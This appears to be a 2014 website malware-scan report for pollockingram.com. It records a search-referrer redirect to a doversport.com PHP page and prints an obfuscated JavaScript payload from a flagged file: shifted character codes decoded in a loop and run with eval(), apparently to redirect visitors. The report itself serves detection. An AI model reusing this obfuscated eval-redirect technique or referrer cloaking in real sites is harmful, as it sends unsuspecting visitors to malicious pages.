Malicious/Suspicious Redirects
Request | Server response | Status |
URL: http://www.pollockingram.com/ (imitation of visitor from search engine) GET / HTTP/1.1 Host: www.pollockingram.com Referer: http://www.google.com/search?q=redirect+check1 | HTTP/1.1 302 Found Connection: close Date: Fri, 05 Sep 2014 23:05:30 GMT Location: http://doversport.com/summer/images/jpg/l.php Server: Apache Content-Length: 229 Content-Type: text/html; charset=iso-8859-1 | malicious |
Scanned pages/files
Request | Server response | Status |
http://www.pollockingram.com/ | 200 OK Content-Length: 10129 Content-Type: text/html | clean |
http://www.pollockingram.com/3222drg/ | 200 OK Content-Length: 430 Content-Type: text/html | clean |
http://www.pollockingram.com/3222drg/1.php | 200 OK Content-Length: 0 Content-Type: text/html | clean |
http://www.pollockingram.com/test404page.js | 404 Not Found Content-Length: 331 Content-Type: text/html | clean |
http://www.pollockingram.com/3222drg/add.php | 200 OK Content-Length: 71 Content-Type: text/html | clean |
http://www.pollockingram.com/3222drg/icayyeh.js | 200 OK Content-Length: 1076 Content-Type: application/javascript | malicious |
Malicious code - confirmed by antiviruses (see below) var str=["236", "233", "232", "232", "232", "341", "320", "337", "255", "335", "334", "341", "284", "271", "282", "236", "233", "232", "232", "232", "325", "340", "333", "322", "339", "328", "334", "333", "255", "328", "331", "338", "332", "320", "328", "331", "324", "263", "336", "340", "324", "337", "344", "264", "346", "236", "233", "232", "232", "232", "232", "342", "328", "333", "323", "334", "342", "269", "331", "334", "322", "320", "339", "328", "334", "333", "284", "262", "327", "339", " var temp=''; var gg=''; for (i=0; i<str.length; i++){ gg=str[i]-223; temp=temp+String.fromCharCode(gg); } eval(temp); Antivirus reports:
| ||
http://www.pollockingram.com/3222drg/images/ | 200 OK Content-Length: 416 Content-Type: text/html | clean |
http://www.pollockingram.com/3222drg/images/1.jpg | 200 OK Content-Length: 4713 Content-Type: image/jpeg | clean |
http://www.pollockingram.com/3222drg/images/AUDI_1024X768_30.jpg | 200 OK Content-Length: 12986 Content-Type: image/jpeg | clean |
http://www.pollockingram.com/3222drg/images/backgrounds_ru_24183.jpg | 200 OK Content-Length: 3891 Content-Type: image/jpeg | clean |
http://www.pollockingram.com/3222drg/shablon.html | 200 OK Content-Length: 3037 Content-Type: text/html | clean |
http://www.pollockingram.com/3222drg/index.php | 404 Not Found Content-Length: 334 Content-Type: text/html | clean |
http://www.pollockingram.com/5046drg/ | 200 OK Content-Length: 558 Content-Type: text/html | clean |
http://www.pollockingram.com/5046drg/1.php | 200 OK Content-Length: 0 Content-Type: text/html | clean |
http://www.pollockingram.com/5046drg/add.php | 200 OK Content-Length: 71 Content-Type: text/html | clean |
Safe Browsing / Blacklists
Query: http://www.google.com/safebrowsing/diagnostic?site=pollockingram.com
Result: This site is not currently listed as suspicious.
Result: This site is not currently listed as suspicious.
Query: http://yandex.com/infected?l10n=en&url=http://pollockingram.com/
Result: pollockingram.com is not infected or malware details are not published yet.
Result: pollockingram.com is not infected or malware details are not published yet.